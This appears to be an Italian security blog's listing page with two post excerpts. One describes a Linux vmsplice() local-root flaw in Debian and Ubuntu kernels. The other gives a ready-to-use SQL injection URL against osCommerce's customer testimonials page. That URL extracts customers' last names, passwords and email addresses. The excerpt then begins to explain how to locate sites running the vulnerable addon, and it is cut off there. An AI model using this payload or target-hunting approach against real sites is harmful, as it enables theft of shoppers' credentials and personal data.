Linux vmsplice Local Root Exploit

Nei kernel distribuiti da Debian ed Ubuntu è stata individuata e confermata una vulnerabilità che garantisce ad un utente locale la possibilità di diventare root, eseguendo semplicemente questo exploit; la falla di sicurezza è stata individuata nell’errato comportamento della system call vmsplice() e, sebbene al momento il bug sia stato confermato solo in Debian ed […]

Posted in: bug & exploit, linux | No Comments »

osCommerce customers testimonials Sql injection

Di solito non segnalo bug già noti. Ma osCommerce è un CMS di vendita online ed un SQL inject su questo CMS permette di accedere ai dati degli utenti registrati su un determinato sito. La segnalazione del bug è su milw0rm
L’exploit consiste nell’iniettare una query sql tramite $_GET

http://www.vuln.oscommerce.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0×3a,customers_password,0×3a,customers_email_address),4,5,6,7,8+from+customers/*

Per trovare siti con installato l’addon […]

Posted in: bug & exploit, hacking, sql injection | 1 Comment »